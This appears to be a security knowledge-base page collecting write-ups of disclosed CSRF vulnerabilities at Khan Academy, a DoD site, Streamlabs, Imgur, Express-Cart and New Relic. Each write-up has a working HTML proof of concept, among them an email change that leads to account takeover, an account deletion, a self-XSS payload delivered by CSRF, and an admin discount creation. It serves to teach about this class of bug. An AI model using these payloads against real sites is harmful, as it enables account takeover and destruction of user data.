Write-ups

Khan Academy - Account takeover

Researcher discovered that an account with an unconfirmed email address can be taken over by triggering a CSRF on the /signup/email API endpoint.

The PoC exploit code below sends an HTTP POST request when the HTML is loaded in a web browser. When the Window loads it triggers the event listener on line 28 which forms and sends the HTTP POST request with the email attacker@rapidlight.io to the API endpoint https://www.khanacademy.org/signup/email. The withCredentials flag is set to true on the XMLHttpRequest object on line 32. This flag:

indicates whether or not cross-site Access-Control requests should be made using credentials such as cookies, authorization headers or TLS client certificates.
-Mozilla

<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8" />
        <title>Khan Academy Signup Email CSRF PoC</title>
        <style type="text/css">
        body {
            display:flex;
            flex-direction:column;
            justify-content:center;
            min-height:100vh;
            margin:0;
        }
        p {
            display:flex;
            align-self:center;
            font-size:0.8rem;
            font-family:sans-serif;
            font-weight:bold;
            text-transform:uppercase;
            letter-spacing:0.1rem;
        }
        </style>
    </head>
    <body>
        <p>Khan Academy Signup Email CSRF PoC</p>
        <script type="text/javascript">
            window.addEventListener('load', function(e) {
                var attacker_addr = 'attacker@rapidlight.io';
                var x = new XMLHttpRequest();
                x.open('POST', 'https://www.khanacademy.org/signup/email', true);
                x.withCredentials = true;
                x.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
                x.send('email=' + encodeURIComponent(attacker_addr));
            }, false);
        </script>
    </body>
</html>

Upon visiting the attacker controlled website which contains the code above, the victim's browser will send the HTTP POST request with the changed email to the api endpoint changing their user's legitimate email to the attacker controlled email address. Once the email address has been changed to the attacker controlled email address, a password reset with the new email allows for full account compromise.

Researcher provided PoC:

DoD - Account Deletion

Researcher discovered endpoint which contains a CSRF vulnerability that allows an attacker to delete a victims account. The endpoint <unknownDoDwebsite>/services/user/closeAccount does not have CSRF protections in place, getting a victim to open a website in the same browser with the code below will delete the victims user account.


 <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="████████/services/user/closeAccount" method="POST"> <input type="submit" value="Submit request" /> </form> </body> </html>

Streamlabs - Remove User Donation Info

Researcher discovered that the endpoint to modify user donation settings does not properly implement CSRF mitigations.

Original HTTP POST request with X-CSRF and X-XSRF headers removed (as they were not validated server-side).

POST /api/v6/viewer-portal/viewer-settings/donation_settings HTTP/1.1
Host: streamlabs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 143
Connection: close
Cookie: Redacted
Upgrade-Insecure-Requests: 1

{"username":{"value":"shirley","autofill":false},"amount":{"value":null,"currency":"USD","autofill":true},"clips":{"isVisibleToPublic":true}}

Response:

HTTP/1.1 200 OK
Date: Thu, 03 Dec 2020 02:38:51 GMT
Content-Type: application/json


true

Visiting URL https://streamlabs.com/api/v6/viewer-portal/viewer-settings/donation_settings returns donation settings in JSON:

HTTP/1.1 200 OK
Date: Thu, 03 Dec 2020 02:48:11 GMT
Content-Type: application/json
Content-Length: 
Connection: close

{"settings":{"clips":{"isVisibleToPublic":true},"amount":{"value":null,"autofill":true,"currency":"USD"},"username":{"value":"shirley","autofill":false}}}

Using the exploit HTML code below and opening in a web browser deletes all user donation info:

<html>
<title>JSON CSRF POC</title>
<center>
<h1> JSON CSRF POC </h1>
<body onload="document.createElement('form').submit.call(document.getElementById('myForm'))">
<form id="myForm" action=https://streamlabs.com/api/v6/viewer-portal/viewer-settings/donation_settings method=post enctype="text/plain" >
<input name='{"username":{"value":"shirley","autofill":false},"amount":{"value":null,"currency":"USD","autofill":true},"clips":{"isVisibleToPublic":true,"ignore_me":"' value='test"}}'type='hidden'>
</form>
</center>
</html>

Now that the donation info has been removed, validate it by visiting the donation_settings URL visited previously:

HTTP/1.1 200 OK
Date: Thu, 03 Dec 2020 02:48:11 GMT
Content-Type: application/json
Content-Length: 15
Connection: close


{"settings":[]}

Researcher provided PoC:

Imgur - CSRF and Self-XSS

Researcher discovered combined self-XSS and CSRF attack that can be used to conduct a XSS attack on any user who visits a malicious website while logged into Imgur in the same browser.

The exploit HTML code creates a favorites folder with the XSS payload

New Test"><img src=x onerror=prompt(2)>

Once the user visits the malicious website hosting the HTML code below, the code sends the request to Imgur to create a favorites folder for the authenticated user with the Self-XSS payload.

<html>
<body onload='document.forms[0].submit()'>
  <form method='POST' enctype='application/json' action='https://api.imgur.com/3/folders'>
    <input name='name' value='New Test"><img src=x onerror=prompt(2)>'>
    <input name='is_private' value='false'>
  </form>
</body>
</html>

Express-Cart - Free Discounts

The Node.js Express-Cart module is a fully functional shopping cart. Researcher discovered admin endpoint that creates discounts does not have CSRF protections in place. The PoC HTML code below creates a 30% discount code that could be used throughout the application.

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:1111/admin/settings/discount/create" method="POST">
      <input type="hidden" name="code" value="CSRF&#45;CODE&#45;DEMO" />
      <input type="hidden" name="type" value="percent" />
      <input type="hidden" name="value" value="30" />
      <input type="hidden" name="start" value="21&#47;02&#47;2020&#32;14&#58;32" />
      <input type="hidden" name="end" value="22&#47;02&#47;2020&#32;14&#58;32" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

New Relic - New Role

Exploit CSRF HTML code creates a new role using HTTP POST request on endpoint https://user-management.service.newrelic.com/accounts/2260599/roles with the role name of CSRF_ROLE.

<body></body>
<script>
  var csrf_page_content = `<form action="https://user-management.service.newrelic.com/accounts/2260599/roles" method="post">
  <input type="hidden" name="role&#91;display&#95;name&#93;" value="CSRF_ROLE" />
      <input type="hidden" name="role&#91;batches&#93;&#91;&#93;" value="" />
      <input type="submit"></form>
      <script>document.forms[0].submit()</sc` + `ript>`
  var f = document.createElement('iframe');
  f.src = 'data:text/html;base64,' + btoa(csrf_page_content);
  document.body.appendChild(f);
</script>

Visiting the roles page https://account.newrelic.com/accounts/<account_id>/roles shows the newly created role after exploit code executes in the victims browser .

PreviousCross Site Request Forgery (CSRF)NextSource Code Examples

Last updated 3 years ago